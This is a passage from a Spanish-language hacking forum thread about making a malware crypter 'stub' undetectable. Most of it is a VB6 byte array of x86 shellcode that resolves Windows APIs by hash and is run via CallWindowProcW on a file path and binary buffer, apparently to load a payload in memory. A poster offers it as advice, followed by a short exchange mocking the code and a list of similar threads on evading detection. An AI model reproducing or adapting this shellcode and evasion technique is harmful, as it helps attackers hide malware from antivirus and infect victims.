Pink(1106) = &H0
Pink(1107) = &H0
Pink(1108) = &H0
Pink(1109) = &H68
Pink(1110) = &HA4
Pink(1111) = &H4E
Pink(1112) = &HE
Pink(1113) = &HEC
Pink(1114) = &H50
Pink(1115) = &HE8
Pink(1116) = &H4B
Pink(1117) = &H0
Pink(1118) = &H0
Pink(1119) = &H0
Pink(1120) = &H83
Pink(1121) = &HC4
Pink(1122) = &H8
Pink(1123) = &HFF
Pink(1124) = &H74
Pink(1125) = &H24
Pink(1126) = &H4
Pink(1127) = &HFF
Pink(1128) = &HD0
Pink(1129) = &HFF
Pink(1130) = &H74
Pink(1131) = &H24
Pink(1132) = &H8
Pink(1133) = &H50
Pink(1134) = &HE8
Pink(1135) = &H38
Pink(1136) = &H0
Pink(1137) = &H0
Pink(1138) = &H0
Pink(1139) = &H83
Pink(1140) = &HC4
Pink(1141) = &H8
Pink(1142) = &HC3
Pink(1143) = &H55
Pink(1144) = &H52
Pink(1145) = &H51
Pink(1146) = &H53
Pink(1147) = &H56
Pink(1148) = &H57
Pink(1149) = &H33
Pink(1150) = &HC0
Pink(1151) = &H64
Pink(1152) = &H8B
Pink(1153) = &H70
Pink(1154) = &H30
Pink(1155) = &H8B
Pink(1156) = &H76
Pink(1157) = &HC
Pink(1158) = &H8B
Pink(1159) = &H76
Pink(1160) = &H1C
Pink(1161) = &H8B
Pink(1162) = &H6E
Pink(1163) = &H8
Pink(1164) = &H8B
Pink(1165) = &H7E
Pink(1166) = &H20
Pink(1167) = &H8B
Pink(1168) = &H36
Pink(1169) = &H38
Pink(1170) = &H47
Pink(1171) = &H18
Pink(1172) = &H75
Pink(1173) = &HF3
Pink(1174) = &H80
Pink(1175) = &H3F
Pink(1176) = &H6B
Pink(1177) = &H74
Pink(1178) = &H7
Pink(1179) = &H80
Pink(1180) = &H3F
Pink(1181) = &H4B
Pink(1182) = &H74
Pink(1183) = &H2
Pink(1184) = &HEB
Pink(1185) = &HE7
Pink(1186) = &H8B
Pink(1187) = &HC5
Pink(1188) = &H5F
Pink(1189) = &H5E
Pink(1190) = &H5B
Pink(1191) = &H59
Pink(1192) = &H5A
Pink(1193) = &H5D
Pink(1194) = &HC3
Pink(1195) = &H55
Pink(1196) = &H52
Pink(1197) = &H51
Pink(1198) = &H53
Pink(1199) = &H56
Pink(1200) = &H57
Pink(1201) = &H8B
Pink(1202) = &H6C
Pink(1203) = &H24
Pink(1204) = &H1C
Pink(1205) = &H85
Pink(1206) = &HED
Pink(1207) = &H74
Pink(1208) = &H43
Pink(1209) = &H8B
Pink(1210) = &H45
Pink(1211) = &H3C
Pink(1212) = &H8B
Pink(1213) = &H54
Pink(1214) = &H28
Pink(1215) = &H78
Pink(1216) = &H3
Pink(1217) = &HD5
Pink(1218) = &H8B
Pink(1219) = &H4A
Pink(1220) = &H18
Pink(1221) = &H8B
Pink(1222) = &H5A
Pink(1223) = &H20
Pink(1224) = &H3
Pink(1225) = &HDD
Pink(1226) = &HE3
Pink(1227) = &H30
Pink(1228) = &H49
Pink(1229) = &H8B
Pink(1230) = &H34
Pink(1231) = &H8B
Pink(1232) = &H3
Pink(1233) = &HF5
Pink(1234) = &H33
Pink(1235) = &HFF
Pink(1236) = &H33
Pink(1237) = &HC0
Pink(1238) = &HFC
Pink(1239) = &HAC
Pink(1240) = &H84
Pink(1241) = &HC0
Pink(1242) = &H74
Pink(1243) = &H7
Pink(1244) = &HC1
Pink(1245) = &HCF
Pink(1246) = &HD
Pink(1247) = &H3
Pink(1248) = &HF8
Pink(1249) = &HEB
Pink(1250) = &HF4
Pink(1251) = &H3B
Pink(1252) = &H7C
Pink(1253) = &H24
Pink(1254) = &H20
Pink(1255) = &H75
Pink(1256) = &HE1
Pink(1257) = &H8B
Pink(1258) = &H5A
Pink(1259) = &H24
Pink(1260) = &H3
Pink(1261) = &HDD
Pink(1262) = &H66
Pink(1263) = &H8B
Pink(1264) = &HC
Pink(1265) = &H4B
Pink(1266) = &H8B
Pink(1267) = &H5A
Pink(1268) = &H1C
Pink(1269) = &H3
Pink(1270) = &HDD
Pink(1271) = &H8B
Pink(1272) = &H4
Pink(1273) = &H8B
Pink(1274) = &H3
Pink(1275) = &HC5
Pink(1276) = &H5F
Pink(1277) = &H5E
Pink(1278) = &H5B
Pink(1279) = &H59
Pink(1280) = &H5A
Pink(1281) = &H5D
Pink(1282) = &HC3
Pink(1283) = &HC3
Pink(1284) = &H0
Pink(1285) = &H0
Pink(1286) = &H0
Pink(1287) = &H0

 
CallWindowProcW VarPtr(Pink(0)), StrPtr(ruta), VarPtr(binario(0)), 0, 0
End Sub


Espero te sirvan mis consejos. saludos
« Última modificación: 19 Noviembre 2012, 06:44 am por Karcrack » En línea

fary
Moderador
***
Desconectado Desconectado

Mensajes: 1.076



Ver Perfil WWW
Re: [?] Indetectar Stub + Dudas
« Respuesta #4 en: 18 Noviembre 2012, 03:09 am »

@Danyfirex que penosidad de código.

En línea

Un byte a la izquierda.
Danyfirex


Desconectado Desconectado

Mensajes: 493


My Dear Mizuho


Ver Perfil
Re: [?] Indetectar Stub + Dudas
« Respuesta #5 en: 18 Noviembre 2012, 12:57 pm »

@Danyfirex que penosidad de código.



si yo se algo, muy tonto  :-\ pero bueeeee.

saludos mDrinky.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Ayuda] Stub.dll Indetectar
Dudas Generales
NyxKazuya 3 5,627 Último mensaje 2 Marzo 2011, 06:26 am
por SuperDraco
Indetectar archivo .jar?
Java
Sapote 0 1,953 Último mensaje 8 Abril 2011, 08:28 am
por Sapote
como Indetectar .exe?
Análisis y Diseño de Malware
sircam666 6 5,826 Último mensaje 5 Septiembre 2011, 04:51 am
por bitorkos
Indetectar .jar
Java
lucasluks1004 2 3,441 Último mensaje 8 Septiembre 2011, 00:00 am
por lucasluks1004
Como indetectar un crypter, virus, stub, troyano por source VB6
Programación Visual Basic
DroppleX 0 2,796 Último mensaje 14 Noviembre 2014, 17:27 pm
por DroppleX
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines